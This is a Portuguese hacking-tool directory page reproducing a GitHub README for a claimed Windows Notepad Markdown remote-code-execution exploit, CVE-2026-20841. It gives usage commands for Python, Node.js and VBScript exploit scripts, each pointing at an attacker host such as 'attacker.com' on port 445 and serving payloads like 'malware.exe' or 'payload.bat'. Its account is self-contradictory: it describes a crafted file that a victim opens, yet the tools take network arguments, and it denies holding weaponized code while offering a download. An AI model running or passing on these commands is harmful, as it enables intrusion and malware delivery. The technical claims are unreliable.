Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0xblackash/cve-2026-20841
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoAnálise de MalwareAprendizado e EducaçãoExploração de BináriosLabs e Prática
GitHub0xblackash/cve-2026-20841

CVE-2026-20841

CVE-2026-20841

Ver Repositório
111há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-20841 - Execução Remota de Código (RCE) no Bloco de Notas do Windows

Imagem ChatGPT 1 de Junho de 2026, 23_00_33

Windows Severity CVE Status

Repositório de Pesquisa em Segurança e Análise Técnica


⚠️ Este repositório destina-se apenas a fins educacionais, defensivos e de pesquisa.


📖 Visão Geral

CVE-2026-20841 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta a funcionalidade de processamento Markdown do Bloco de Notas do Windows.

Um invasor pode ser capaz de acionar a execução arbitrária de código quando um arquivo especialmente criado é aberto por uma versão vulnerável do Bloco de Notas do Windows.

Impacto

  • Execução Remota de Código (RCE)
  • Execução Arbitrária de Código
  • Potencial Comprometimento em Nível de Usuário
  • Desvio de Limite de Segurança
  • Vetor de Distribuição de Malware

🎯 Produtos Afetados

Baixar ferramenta
ProdutoStatus
Bloco de Notas do Windows 11Vulnerável
Bloco de Notas do Windows 10Vulnerável
Versões Atualizadas/CorrigidasNão Vulnerável

🔥 Informações da Vulnerabilidade

CampoValor
CVECVE-2026-20841
TipoExecução Remota de Código
Vetor de AtaqueArquivo Especialmente Criado
Interação do UsuárioNecessária
Privilégios NecessáriosNenhum
GravidadeCrítica
FornecedorMicrosoft

📖 Como Usar :

root@kitploit:~
python CVE-2026-20841.py 192.168.1.100 80 malware.exe

Versão Node.js

root@kitploit:~
node CVE-2026-20841.js <host> <port> <payload-filename>

Exemplo:

root@kitploit:~
node CVE-2026-20841.js attacker.com 445 payload.bat

Versão VBScript (Nativo do Windows)

root@kitploit:~
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>

Exemplo:

root@kitploit:~
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe

🛠 Detalhes Técnicos

A vulnerabilidade existe na funcionalidade de manipulação de conteúdo Markdown do Bloco de Notas do Windows.

Abrir um arquivo especialmente criado pode acionar operações de memória inseguras que podem levar à execução arbitrária de código no contexto do usuário atual.

Fluxo de Ataque Potencial

root@kitploit:~
Atacante
    │
    ▼
Arquivo Markdown Criado Especialmente
    │
    ▼
Vítima Abre o Arquivo
    │
    ▼
Analisador Markdown Vulnerável
    │
    ▼
Corrupção de Memória
    │
    ▼
Execução de Código


🧪 Ambiente de Laboratório

root@kitploit:~
OS          : Windows 11
Aplicativo  : Bloco de Notas
Arquitetura : x64
Depurador   : WinDbg
Análise     : Estática + Dinâmica

🔍 Detecção

Indicadores de Comprometimento (IOCs)

  • Arquivos Markdown suspeitos
  • Processos filhos inesperados do Bloco de Notas
  • Falhas anormais do Bloco de Notas
  • Eventos de corrupção de memória
  • Alertas de EDR relacionados ao Bloco de Notas

🛡 Mitigação

  • Aplicar as atualizações de segurança da Microsoft.
  • Restringir a abertura de arquivos de fontes não confiáveis.
  • Ativar o monitoramento EDR/XDR.
  • Usar políticas de Controle de Aplicativos.
  • Monitorar eventos de criação de processos envolvendo o Bloco de Notas.

📚 Referências

  • Avisos de Segurança da Microsoft
  • Banco de Dados CVE da MITRE
  • Documentação de Segurança do Windows
  • Publicações de Pesquisa em Segurança

⚠ Aviso Legal

Este repositório não contém código de exploração armado.

As informações fornecidas destinam-se exclusivamente a:

  • Pesquisa em Segurança
  • Análise Defensiva
  • Gerenciamento de Vulnerabilidades
  • Fins Educacionais

Os usuários são responsáveis por cumprir todas as leis e regulamentos aplicáveis.


⭐ Se este repositório ajudou sua pesquisa, considere dar uma estrela.

Pesquisa em Segurança Cibernética • Análise de Vulnerabilidades • Segurança Defensiva